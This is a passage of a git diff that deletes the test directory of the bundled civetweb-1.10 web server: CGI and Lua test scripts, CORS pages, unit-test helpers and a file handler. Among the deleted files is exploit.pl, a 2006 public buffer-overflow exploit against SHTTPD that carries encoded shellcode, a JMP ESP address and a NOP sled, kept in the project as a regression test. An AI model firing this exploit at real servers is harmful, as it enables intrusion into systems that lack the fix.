-my $num_flags = @flags;
-
-sub fail {
-	print "FAILED: @_\n";
-	exit 1;
-}
-
-my $platform = $ARGV[0] || "linux";
-
-for (my $i = 0; $i < 2 ** $num_flags; $i++) {
-	my $bitmask = sprintf("%*.*b", $num_flags, $num_flags, $i);
-	my @combination = ();
-	for (my $j = 0; $j < $num_flags; $j++) {
-		push @combination, $flags[$j] if substr($bitmask, $j, 1);
-	}
-	my $defines = join(" ", map { "-D$_" } @combination);
-	my $cmd = "CFLAGS=\"$defines\" make clean $platform >/dev/null";
-	system($cmd) == 0 or fail "build failed: $_";
-	print "Build succeeded, flags: [$defines]\n";
-	system("perl test/test.pl basic_tests >/dev/null") == 0
-		or fail "basic tests";
-	print "Basic tests: OK\n";
-}
-
-print "PASS: All builds passed!\n";
diff --git a/thirdparty/civetweb-1.10/test/bad.cgi b/thirdparty/civetweb-1.10/test/bad.cgi
deleted file mode 100755
index 1560f82..0000000
--- a/thirdparty/civetweb-1.10/test/bad.cgi
+++ /dev/null
@@ -1,6 +0,0 @@
-#!/bin/sh
-
-echo "echoing bad headers: server must report status 500"
-exec 1>&2
-echo "Bad CGI script (for test)"
-
diff --git a/thirdparty/civetweb-1.10/test/bad2.cgi b/thirdparty/civetweb-1.10/test/bad2.cgi
deleted file mode 100755
index efa4b54..0000000
--- a/thirdparty/civetweb-1.10/test/bad2.cgi
+++ /dev/null
@@ -1,3 +0,0 @@
-#!/usr/bin/env perl
-
-print "Status: 123 Please pass me to the client\r\n\r\n";
diff --git a/thirdparty/civetweb-1.10/test/bad_page.lp b/thirdparty/civetweb-1.10/test/bad_page.lp
deleted file mode 100644
index 84caacc..0000000
--- a/thirdparty/civetweb-1.10/test/bad_page.lp
+++ /dev/null
@@ -1 +0,0 @@
-test <? bad_script ?> test

diff --git a/thirdparty/civetweb-1.10/test/bad_script.lua b/thirdparty/civetweb-1.10/test/bad_script.lua
deleted file mode 100644
index 6140617..0000000
--- a/thirdparty/civetweb-1.10/test/bad_script.lua
+++ /dev/null
@@ -1 +0,0 @@
-bad_script 

diff --git a/thirdparty/civetweb-1.10/test/cgi_test.c b/thirdparty/civetweb-1.10/test/cgi_test.c
deleted file mode 100644
index bd446c0..0000000
--- a/thirdparty/civetweb-1.10/test/cgi_test.c
+++ /dev/null
@@ -1,40 +0,0 @@
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-
-#if defined(_WIN32) || defined(WIN32) || defined(WINDOWS)
-#include <fcntl.h>
-#include <io.h>
-#endif
-
-int
-main(int argc, char *argv[])
-{
-	char buf[1024];
-	size_t rec_len = 0;
-	const char *response_header = "Content-Type: text/plain\r\n"
-	                              "Connection: close\r\n"
-	                              "\r\n";
-	const char *req_method = getenv("REQUEST_METHOD");
-	const char *con_length = getenv("CONTENT_LENGTH");
-
-#if defined(_WIN32) || defined(WIN32) || defined(WINDOWS)
-	_setmode(_fileno(stdin), _O_BINARY);
-	_setmode(_fileno(stdout), _O_BINARY);
-#endif
-
-	/* Write the response header with \r\n */
-	fwrite(response_header, 1, strlen(response_header), stdout);
-
-	/* Headline for generated reply: */
-	printf("Got message:\n  Method: %s\n  Content-Length: %s\n  Content: ",
-	       req_method,
-	       con_length ? con_length : "not set");
-
-	/* Read all data from stdin and send it to stdout */
-	while ((rec_len = fread(buf, 1, sizeof(buf) - 1, stdin)) > 0) {
-		fwrite(buf, 1, rec_len, stdout);
-	}
-
-	return 0;
-}
diff --git a/thirdparty/civetweb-1.10/test/cgi_test.html b/thirdparty/civetweb-1.10/test/cgi_test.html
deleted file mode 100644
index 28ad72b..0000000
--- a/thirdparty/civetweb-1.10/test/cgi_test.html
+++ /dev/null
@@ -1,12 +0,0 @@
-<html>
-  <head>
-    <title>CGI POST Test</title>
-  </head>
-  <body>
-    <h1>CGI POST Test</h1>
-    <form action="cgi_test.cgi" method="post">
-      <input type="text" name="test" />
-      <input type="submit" />
-    </form>
-  </body>
-</html>
diff --git a/thirdparty/civetweb-1.10/test/civetweb_check.h b/thirdparty/civetweb-1.10/test/civetweb_check.h
deleted file mode 100644
index 4701f22..0000000
--- a/thirdparty/civetweb-1.10/test/civetweb_check.h
+++ /dev/null
@@ -1,96 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_CIVETWEB_CHECK_H_
-#define TEST_CIVETWEB_CHECK_H_
-
-#ifdef __clang__
-#pragma clang diagnostic push
-// FIXME: check uses GCC specific variadic macros that are non-standard
-#pragma clang diagnostic ignored "-Wgnu-zero-variadic-macro-arguments"
-#endif
-
-#if defined(__MINGW__) || defined(__GNUC__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wall"
-/* Disable warnings for defining _CRT_SECURE_NO_* (here) and
- * _CHECK_CHECK_STDINT_H (in check.h)
- */
-/* Disable until Warning returns to Travis CI or AppVeyor
-#pragma GCC diagnostic ignored "-Wunknown-pragmas"
-#pragma GCC diagnostic ignored "-Wno-variadic-macros"
-#pragma GCC diagnostic ignored "-Wreserved-id-macro"
-*/
-#endif
-
-#ifdef _MSC_VER
-#undef pid_t
-#define pid_t int
-/* Unreferenced formal parameter. START_TEST has _i */
-#pragma warning(disable : 4100)
-/* conditional expression is constant . asserts use while(0) */
-#pragma warning(disable : 4127)
-#endif
-#include <stdint.h>
-
-/* All unit tests use the "check" framework.
- * Download from https://libcheck.github.io/check/
- */
-#include "check.h"
-
-#if (CHECK_MINOR_VERSION < 11)
-#ifndef LOCAL_TEST
-#error "CivetWeb unit tests require at least check 0.11.0"
-#endif
-#endif
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-#if !defined(_CRT_SECURE_NO_WARNINGS)
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#if !defined(_CRT_SECURE_NO_DEPRECATE)
-#define _CRT_SECURE_NO_DEPRECATE
-#endif
-
-#if defined(__MINGW__) || defined(__GNUC__)
-#pragma GCC diagnostic pop
-#endif
-
-#ifdef __clang__
-/* When using -Weverything, clang does not accept it's own headers
- * in a release build configuration. Disable what is too much in
- * -Weverything. */
-#pragma clang diagnostic ignored "-Wdisabled-macro-expansion"
-#endif
-
-/* A minimal timeout used for all tests with the "check" framework. */
-#define civetweb_min_test_timeout (30)
-
-/* A minimal timeout for all tests starting a server. */
-#define civetweb_min_server_test_timeout (civetweb_min_test_timeout + 30)
-
-/* A default timeout for all tests running multiple requests to a server. */
-#define civetweb_mid_server_test_timeout                                       \
-	(civetweb_min_server_test_timeout + 180)
-
-#endif /* TEST_CIVETWEB_CHECK_H_ */
diff --git a/thirdparty/civetweb-1.10/test/cors.html b/thirdparty/civetweb-1.10/test/cors.html
deleted file mode 100644
index 10fb99a..0000000
--- a/thirdparty/civetweb-1.10/test/cors.html
+++ /dev/null
@@ -1,75 +0,0 @@
-<!DOCTYPE html>

-<html>

-<head>

-<title>CORS test</title>

-<style>

- html,body{font:normal 1em arial,helvetica;}

-</style>

-

-<script> // http://www.html5rocks.com/en/tutorials/cors/

-

-// Create the XHR object.

-function createCORSRequest(method, url) {

-  var xhr = new XMLHttpRequest();

-  if ("withCredentials" in xhr) {

-    // XHR for Chrome/Firefox/Opera/Safari.

-    xhr.open(method, url, true);

-  } else if (typeof XDomainRequest != "undefined") {

-    // XDomainRequest for IE.

-    xhr = new XDomainRequest();

-    xhr.open(method, url);

-  } else {

-    // CORS not supported.

-    xhr = null;

-  }

-  return xhr;

-}

-

-// Helper method to parse the title tag from the response.

-function getTitle(text) {

-  return text.match('<title>(.*)?</title>')[1];

-}

-

-// Make the actual CORS request.

-function makeCorsRequest(method, resource) {

-  var url = "http://localhost:8080/cors.reply." + resource;

-  var xhr = createCORSRequest(method, url);

-  if (!xhr) {

-    alert('ERROR: CORS not supported');

-    return;

-  }

-

-  // Response handlers.

-  xhr.onload = function() {

-    var text = xhr.responseText;

-    var title = getTitle(text);

-    alert('Response from CORS request to ' + url + ':\n' + title);

-  };

-

-  xhr.onerror = function() {

-    alert('ERROR: the request failed.');

-  };

-

-  xhr.send();

-}

-

-function start() {

-  var el = document.getElementById("from");

-  el.innerHTML = "Test CORS from " + document.URL + " to http://localhost:8080/cors.reply.*";

-  if ((document.URL.indexOf("localhost") >= 0) || (document.URL.indexOf("127.0.0.1") >= 0)) {

-    alert("This CORS test is only meaningful, if you open this site with a different url than \'localhost\' (127.0.0.1).\nYou may use a different IP of the same machine.");

-  }

-}

-</script>

-

-</head>

-<body onload="start()">

- <h1>Cross-origin resource sharing test</h1>

- <p id="from">*** Error: Javascript is not activated. This test will not work. ***</p>

- <button onclick="makeCorsRequest('GET', 'html')">Run CORS GET request (static resource)</button>

- <button onclick="makeCorsRequest('GET', 'shtml')">Run CORS GET request (ssi)</button>

- <button onclick="makeCorsRequest('GET', 'lua/getit')">Run CORS GET request (dynamic resource)</button>

- <button onclick="makeCorsRequest('PUT', 'lua/putit')">Run CORS PUT request (dynamic resource)</button>

- <p>More information on CORS: See <a href="http://enable-cors.org/">enable-cors.org</a> and <a href="http://www.html5rocks.com/en/tutorials/cors/">html5rocks.com</a>.</p>

-</body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/cors.reply.html b/thirdparty/civetweb-1.10/test/cors.reply.html
deleted file mode 100644
index 26d88df..0000000
--- a/thirdparty/civetweb-1.10/test/cors.reply.html
+++ /dev/null
@@ -1,7 +0,0 @@
-<!DOCTYPE html>

-<html>

-<head><title>CORS test reply - test OK</title></head>

-<body>

-Do not load this page directly - use cors.html instead!

-</body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/cors.reply.lua b/thirdparty/civetweb-1.10/test/cors.reply.lua
deleted file mode 100644
index 57b9727..0000000
--- a/thirdparty/civetweb-1.10/test/cors.reply.lua
+++ /dev/null
@@ -1,86 +0,0 @@
--- http://www.html5rocks.com/static/images/cors_server_flowchart.png

-

-if not mg.request_info.http_headers.Origin and not mg.request_info.http_headers.origin then

-

-  mg.write("HTTP/1.0 200 OK\r\n")

-  mg.write("Connection: close\r\n")

-  mg.write("Content-Type: text/html; charset=utf-8\r\n")

-  mg.write("\r\n")

-  mg.write("This test page should not be used directly. Open cors.html instead.")

-  return

-end

-

-if mg.request_info.request_method == "OPTIONS" then

-

-  -- Note: This is a test example showing how a script could handle

-  -- a preflight request directly. However, now the server is able

-  -- to handle preflight requests, so scripts do no longer need to

-  -- do this - except it has been disabled in the server by setting

-  -- the access_control_allow_methods configuration parameter to

-  -- an empty string. 

-

-  local acrm = mg.request_info.http_headers['Access-Control-Request-Method'];

-  if (acrm) then

-    local acrh = nil -- mg.request_info.http_headers['Access-Control-Request-Header'];

-    if (acrm~='PUT') then

-      -- invalid request

-      mg.write("HTTP/1.0 403 Forbidden\r\n")

-      mg.write("Connection: close\r\n")

-      mg.write("\r\n")

-      return

-    else

-      -- preflight request

-      mg.write("HTTP/1.0 200 OK\r\n")

-      mg.write("Access-Control-Allow-Methods: PUT\r\n")

-      if (acrh) then

-        mg.write("Access-Control-Allow-Headers: " .. acrh .. "\r\n")

-      end

-      mg.write("Access-Control-Allow-Origin: *\r\n")

-      mg.write("Connection: close\r\n")

-      mg.write("Content-Type: text/html; charset=utf-8\r\n")

-      mg.write("\r\n")

-      return

-    end

-  end

-end

-

-

--- actual request

-if mg.request_info.request_method == "GET" then

-

-  mg.write("HTTP/1.0 200 OK\r\n")

-  mg.write("Access-Control-Allow-Origin: *\r\n")

-  mg.write("Connection: close\r\n")

-  mg.write("Content-Type: text/html; charset=utf-8\r\n")

-  mg.write("\r\n")

-  mg.write([[<!DOCTYPE html>

-  <html>

-  <head><title>CORS dynamic GET test reply - test OK</title></head>

-  <body>This should never be shown</body>

-  </html>

-  ]])

-  return

-end

-

-

-if mg.request_info.request_method == "PUT" then

-

-  mg.write("HTTP/1.0 200 OK\r\n")

-  mg.write("Access-Control-Allow-Origin: *\r\n")

-  mg.write("Connection: close\r\n")

-  mg.write("Content-Type: text/html; charset=utf-8\r\n")

-  mg.write("\r\n")

-  mg.write([[<!DOCTYPE html>

-  <html>

-  <head><title>CORS dynamic PUT test reply - test OK</title></head>

-  <body>This should never be shown</body>

-  </html>

-  ]])

-  return

-end

-

--- other HTTP method

-mg.write("HTTP/1.0 403 Forbidden\r\n")

-mg.write("Connection: close\r\n")

-mg.write("\r\n")

-

diff --git a/thirdparty/civetweb-1.10/test/cors.reply.shtml b/thirdparty/civetweb-1.10/test/cors.reply.shtml
deleted file mode 100644
index 26d88df..0000000
--- a/thirdparty/civetweb-1.10/test/cors.reply.shtml
+++ /dev/null
@@ -1,7 +0,0 @@
-<!DOCTYPE html>

-<html>

-<head><title>CORS test reply - test OK</title></head>

-<body>

-Do not load this page directly - use cors.html instead!

-</body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/delayed.cgi b/thirdparty/civetweb-1.10/test/delayed.cgi
deleted file mode 100644
index ccf7768..0000000
--- a/thirdparty/civetweb-1.10/test/delayed.cgi
+++ /dev/null
@@ -1,20 +0,0 @@
-#!/bin/sh
-
-sleep 2
-
-echo "Content-Type: text/plain"
-
-sleep 2
-
-echo
-
-sleep 2
-
-echo "Query string:"
-
-sleep 2
-
-echo $QUERY_STRING
-
-sleep 2
-
diff --git a/thirdparty/civetweb-1.10/test/dir with spaces/hello.cgi b/thirdparty/civetweb-1.10/test/dir with spaces/hello.cgi
deleted file mode 100755
index 39decbe..0000000
--- a/thirdparty/civetweb-1.10/test/dir with spaces/hello.cgi
+++ /dev/null
@@ -1,3 +0,0 @@
-#!/usr/bin/env perl
-
-print "Content-Type: text/plain\n\nhello\n";
diff --git a/thirdparty/civetweb-1.10/test/echo.lua b/thirdparty/civetweb-1.10/test/echo.lua
deleted file mode 100644
index bc71553..0000000
--- a/thirdparty/civetweb-1.10/test/echo.lua
+++ /dev/null
@@ -1,41 +0,0 @@
-
-if mg.lua_type ~= "websocket" then
-  mg.write("HTTP/1.0 403 Forbidden\r\n")
-  mg.write("Connection: close\r\n")
-  mg.write("\r\n")
-  mg.write("forbidden")
-  return
-end
-
-
--- table of all active connection
-allConnections = {}
-
--- function to get a client identification string
-function who(tab)
-  local ri = allConnections[tab.client].request_info
-  return ri.remote_addr .. ":" .. ri.remote_port
-end
-
--- Callback to accept or reject a connection
-function open(tab)
-  allConnections[tab.client] = tab
-  return true -- return true to accept the connection
-end
-
--- Callback for "Websocket ready"
-function ready(tab)
-  return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket received data"
-function data(tab)
-    mg.write(1, tab.data);
-    return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket is closing"
-function close(tab)
-    allConnections[tab.client] = nil
-end
-
diff --git a/thirdparty/civetweb-1.10/test/embed.c b/thirdparty/civetweb-1.10/test/embed.c
deleted file mode 100644
index 174e17c..0000000
--- a/thirdparty/civetweb-1.10/test/embed.c
+++ /dev/null
@@ -1,182 +0,0 @@
-// Copyright (c) 2004-2009 Sergey Lyubka
-//
-// Permission is hereby granted, free of charge, to any person obtaining a copy
-// of this software and associated documentation files (the "Software"), to deal
-// in the Software without restriction, including without limitation the rights
-// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-// copies of the Software, and to permit persons to whom the Software is
-// furnished to do so, subject to the following conditions:
-//
-// The above copyright notice and this permission notice shall be included in
-// all copies or substantial portions of the Software.
-//
-// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-// THE SOFTWARE.
-//
-// Unit test for the civetweb web server. Tests embedded API.
-
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#ifndef _WIN32
-#include <unistd.h>
-#endif
-
-#include "civetweb.h"
-
-#if !defined(LISTENING_PORT)
-#define LISTENING_PORT "23456"
-#endif
-
-static const char *standard_reply = "HTTP/1.1 200 OK\r\n"
-  "Content-Type: text/plain\r\n"
-  "Connection: close\r\n\r\n";
-
-static void test_get_var(struct mg_connection *conn,
-                         const struct mg_request_info *ri) {
-  char *var, *buf;
-  size_t buf_len;
-  const char *cl;
-  int var_len;
-
-  mg_printf(conn, "%s", standard_reply);
-
-  buf_len = 0;
-  var = buf = NULL;
-  cl = mg_get_header(conn, "Content-Length");
-  mg_printf(conn, "cl: %p\n", cl);
-  if ((!strcmp(ri->request_method, "POST") ||
-       !strcmp(ri->request_method, "PUT"))
-      && cl != NULL) {
-    buf_len = atoi(cl);
-    buf = malloc(buf_len);
-    /* Read in two pieces, to test continuation */
-    if (buf_len > 2) {
-      mg_read(conn, buf, 2);
-      mg_read(conn, buf + 2, buf_len - 2);
-    } else {
-      mg_read(conn, buf, buf_len);
-    }
-  } else if (ri->query_string != NULL) {
-    buf_len = strlen(ri->query_string);
-    buf = malloc(buf_len + 1);
-    strcpy(buf, ri->query_string);
-  }
-  var = malloc(buf_len + 1);
-  var_len = mg_get_var(buf, buf_len, "my_var", var, buf_len + 1);
-  mg_printf(conn, "Value: [%s]\n", var);
-  mg_printf(conn, "Value size: [%d]\n", var_len);
-  free(buf);
-  free(var);
-}
-
-static void test_get_header(struct mg_connection *conn,
-                            const struct mg_request_info *ri) {
-  const char *value;
-  int i;
-
-  mg_printf(conn, "%s", standard_reply);
-  printf("HTTP headers: %d\n", ri->num_headers);
-  for (i = 0; i < ri->num_headers; i++) {
-    printf("[%s]: [%s]\n", ri->http_headers[i].name, ri->http_headers[i].value);
-  }
-
-  value = mg_get_header(conn, "Host");
-  if (value != NULL) {
-    mg_printf(conn, "Value: [%s]", value);
-  }
-}
-
-static void test_get_request_info(struct mg_connection *conn,
-                                  const struct mg_request_info *ri) {
-  int i;
-
-  mg_printf(conn, "%s", standard_reply);
-
-  mg_printf(conn, "Method: [%s]\n", ri->request_method);
-  mg_printf(conn, "URI: [%s]\n", ri->uri);
-  mg_printf(conn, "HTTP version: [%s]\n", ri->http_version);
-
-  for (i = 0; i < ri->num_headers; i++) {
-    mg_printf(conn, "HTTP header [%s]: [%s]\n",
-              ri->http_headers[i].name,
-              ri->http_headers[i].value);
-  }
-
-  mg_printf(conn, "Query string: [%s]\n",
-            ri->query_string ? ri->query_string: "");
-  mg_printf(conn, "Remote IP: [%lu]\n", ri->remote_ip);
-  mg_printf(conn, "Remote port: [%d]\n", ri->remote_port);
-  mg_printf(conn, "Remote user: [%s]\n",
-            ri->remote_user ? ri->remote_user : "");
-}
-
-static void test_error(struct mg_connection *conn,
-                       const struct mg_request_info *ri) {
-  int status = (int) ri->ev_data;
-  mg_printf(conn, "HTTP/1.1 %d XX\r\n"
-            "Conntection: close\r\n\r\n", status);
-  mg_printf(conn, "Error: [%d]", status);
-}
-
-static void test_post(struct mg_connection *conn,
-                      const struct mg_request_info *ri) {
-  const char *cl;
-  char *buf;
-  int len;
-
-  mg_printf(conn, "%s", standard_reply);
-  if (strcmp(ri->request_method, "POST") == 0 &&
-      (cl = mg_get_header(conn, "Content-Length")) != NULL) {
-    len = atoi(cl);
-    if ((buf = malloc(len)) != NULL) {
-      mg_write(conn, buf, len);
-      free(buf);
-    }
-  }
-}
-
-static const struct test_config {
-  enum mg_event event;
-  const char *uri;
-  void (*func)(struct mg_connection *, const struct mg_request_info *);
-} test_config[] = {
-  {MG_NEW_REQUEST, "/test_get_header", &test_get_header},
-  {MG_NEW_REQUEST, "/test_get_var", &test_get_var},
-  {MG_NEW_REQUEST, "/test_get_request_info", &test_get_request_info},
-  {MG_NEW_REQUEST, "/test_post", &test_post},
-  {MG_HTTP_ERROR, "", &test_error},
-  {0, NULL, NULL}
-};
-
-static void *callback(enum mg_event event,
-                      struct mg_connection *conn) {
-  const struct mg_request_info *request_info = mg_get_request_info(conn);
-  int i;
-
-  for (i = 0; test_config[i].uri != NULL; i++) {
-    if (event == test_config[i].event &&
-        (event == MG_HTTP_ERROR ||
-         !strcmp(request_info->uri, test_config[i].uri))) {
-      test_config[i].func(conn, request_info);
-      return "processed";
-    }
-  }
-
-  return NULL;
-}
-
-int main(void) {
-  struct mg_context *ctx;
-  const char *options[] = {"listening_ports", LISTENING_PORT, NULL};
-
-  ctx = mg_start(callback, NULL, options);
-  pause();
-  return 0;
-}
diff --git a/thirdparty/civetweb-1.10/test/env.cgi b/thirdparty/civetweb-1.10/test/env.cgi
deleted file mode 100755
index 479e1fd..0000000
--- a/thirdparty/civetweb-1.10/test/env.cgi
+++ /dev/null
@@ -1,46 +0,0 @@
-#!/usr/bin/env perl
-
-use Cwd;
-use CGI;
-
-use vars '%in';
-CGI::ReadParse();
-
-print "Content-Type: text/html\r\n\r\n";
-
-print "<pre>\n";
-foreach my $key (sort keys %ENV) {
-	print "$key=$ENV{$key}\n";
-}
-
-print "\n";
-
-foreach my $key (sort keys %in) {
-	print "$key=$in{$key}\n";
-}
-
-print "\n";
-
-print 'CURRENT_DIR=' . getcwd() . "\n";
-print "</pre>\n";
-
-my $stuff = <<EOP ;
-<script language="javascript">
-	function set_val() {
-	}
-</script>
-<form method=get>
-	<input type=hidden name=a>
-	<input type=text name=_a onChange="javascript: this.form.a.value=this.value;">
-	<input type=submit value=get>
-</form>
-
-<form method=post>
-	<input type=text name=b>
-	<input type=submit value=post>
-</form>
-EOP
-
-#system('some shit');
-
-print $stuff;
diff --git a/thirdparty/civetweb-1.10/test/error.lua b/thirdparty/civetweb-1.10/test/error.lua
deleted file mode 100644
index b78d4ac..0000000
--- a/thirdparty/civetweb-1.10/test/error.lua
+++ /dev/null
@@ -1,12 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("\r\n")

-mg.write([[<html><body>

-  <p>Lua error handler:</p>

-  <p>Status code: ]])

-

-mg.write(tostring(mg.request_info.status))

-

-mg.write([[</p>

-</body></html>

-]])
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/test/error404.htm b/thirdparty/civetweb-1.10/test/error404.htm
deleted file mode 100644
index 357db2c..0000000
--- a/thirdparty/civetweb-1.10/test/error404.htm
+++ /dev/null
@@ -1,10 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"

-   "http://www.w3.org/TR/html4/frameset.dtd">

-<HTML>

-<HEAD>

-<TITLE>Error</TITLE>

-</HEAD>

-<BODY>

-Custom error page

-</BODY>

-</HTML>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/test/exit.lua b/thirdparty/civetweb-1.10/test/exit.lua
deleted file mode 100644
index 40356e3..0000000
--- a/thirdparty/civetweb-1.10/test/exit.lua
+++ /dev/null
@@ -1,15 +0,0 @@
-

-msg=[[<html><body>

-<p>Exit CivetWeb</p>

-</body></html>

-]]

-

-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Length: " .. #msg .. "\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("\r\n")

-mg.write(msg)

-

-os.exit(0)

-

diff --git a/thirdparty/civetweb-1.10/test/exploit.pl b/thirdparty/civetweb-1.10/test/exploit.pl
deleted file mode 100755
index 2067089..0000000
--- a/thirdparty/civetweb-1.10/test/exploit.pl
+++ /dev/null
@@ -1,69 +0,0 @@
-#!/usr/bin/perl -w
-
-#  SHTTPD Buffer Overflow (POST)
-#  Tested on SHTTPD 1.34 WinXP SP1 Hebrew
-#  http://shttpd.sourceforge.net
-#  Codded By SkOd, 05/10/2006
-#  ISRAEL
-#
-#    details:
-#    EAX 00000194 , ECX 009EBCA8 , EDX 00BC488C
-#    EBX 00000004 , EIP 41414141 , EBP 41414141
-#    ESI 00BC4358 , EDI 00BCC3CC ASCII "POST"
-#    ESP 009EFC08 ASCII 41,"AA...AAA"
-
-
-use IO::Socket;
-
-sub fail(){
-syswrite STDOUT, "[-]Connect failed.\n";
-exit;
-}
-
-sub header()
-{
-print("##################################\n");
-print("SHTTPD (POST) Buffer Overflow.\n");
-print("[http://shttpd.sourceforge.net]\n");
-print("Codded By SkOd, 05/10/2006\n");
-print("##################################\n");
-}
-
-if (@ARGV < 1)
-{
-    &header();
-    print("Usage: Perl shttpd.pl [host]\n");
-    exit;
-}
-
-&header();
-$host=$ARGV[0];
-$port="80";
-$host=~ s/(http:\/\/)//eg;
-
-#win32_exec- CMD=calc Size=160 (metasploit.com)
-$shell =
-"%33%c9%83%e9%de%d9%ee%d9%74%24%f4%5b%81%73%13%52".
-"%ca%2b%e0%83%eb%fc%e2%f4%ae%22%6f%e0%52%ca%a0%a5".
-"%6e%41%57%e5%2a%cb%c4%6b%1d%d2%a0%bf%72%cb%c0%a9".
-"%d9%fe%a0%e1%bc%fb%eb%79%fe%4e%eb%94%55%0b%e1%ed".
-"%53%08%c0%14%69%9e%0f%e4%27%2f%a0%bf%76%cb%c0%86".
-"%d9%c6%60%6b%0d%d6%2a%0b%d9%d6%a0%e1%b9%43%77%c4".
-"%56%09%1a%20%36%41%6b%d0%d7%0a%53%ec%d9%8a%27%6b".
-"%22%d6%86%6b%3a%c2%c0%e9%d9%4a%9b%e0%52%ca%a0%88".
-"%0d%a2%b3%1e%d8%c4%7c%1f%b5%a9%4a%8c%31%ca%2b%e0";
-
-
-$esp="%73%C3%2A%4F";                 #[4F2AC373]JMP ESP (kernel32.dll) WinXP SP1(Hebrew)
-$buff=("%41"x8).$esp.("%90"x85).$shell;        #Shellcode+NOP=245
-
-print length($buff) . "\n";
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || &fail();
-    syswrite STDOUT,"[+]Connected.\n";
-    print $sock "POST /$buff HTTP/1.1\n";
-    print $sock "HOST:$host\n\n";
-    syswrite STDOUT,"[+]Done.\n";
-close($sock);
-
-# milw0rm.com [2006-10-05]
diff --git a/thirdparty/civetweb-1.10/test/filehandler.lua b/thirdparty/civetweb-1.10/test/filehandler.lua
deleted file mode 100644
index 57bf411..0000000
--- a/thirdparty/civetweb-1.10/test/filehandler.lua
+++ /dev/null
@@ -1,93 +0,0 @@
-function send_ok()

-	mg.write("HTTP/1.0 200 OK\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-end

-

-

-function send_not_found()

-	mg.write("HTTP/1.0 404 Not Found\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-end

-

-

-handler = "filehandler.lua"

-sub_uri = mg.request_info.uri:sub(#handler+2)

-filename = "D:\\civetweb\\civetweb" .. sub_uri

-attr = lfs.attributes(filename)

-

---[[

-if not attr then

-	send_not_found()

-	mg.write("\r\n")

-	mg.write("File " .. sub_uri .. " not available")

-	return

-end

-]]

-

-if mg.request_info.request_method == "GET" then

-	-- send_file will handle 404 internally

-	mg.send_file(filename)

-	return

-

-elseif mg.request_info.request_method == "HEAD" then

-	-- send_file can handle "GET" and "HEAD"

-	mg.send_file(filename)

-	return

-

-elseif mg.request_info.request_method == "PUT" then

-	local f = io.open(filename, "w")

-	if (not f) then

-		mg.write("HTTP/1.0 500 Internal Server Error\r\n")

-		mg.write("Connection: close\r\n")

-		mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-		mg.write("\r\n")

-		return

-	end

-

-	mg.write("HTTP/1.0 201 Created\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-	mg.write("\r\n")

-	repeat

-		local buf = mg.read();

-		if (buf) then

-			f:write(buf)

-		end

-	until (not buf);

-	f:close()

-

-	mg.write("HTTP/1.0 201 Created\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-	mg.write("\r\n")

-	return

-

-elseif mg.request_info.request_method == "DELETE" then

-	if not attr then

-		send_not_found()

-		mg.write("\r\n")

-		mg.write("File " .. sub_uri .. " not available")

-		return

-	end

-	os.remove(filename)

-	mg.write("HTTP/1.0 204 No Content\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-	mg.write("\r\n")

-	return

-

-elseif mg.request_info.request_method == "OPTIONS" then

-	send_ok()
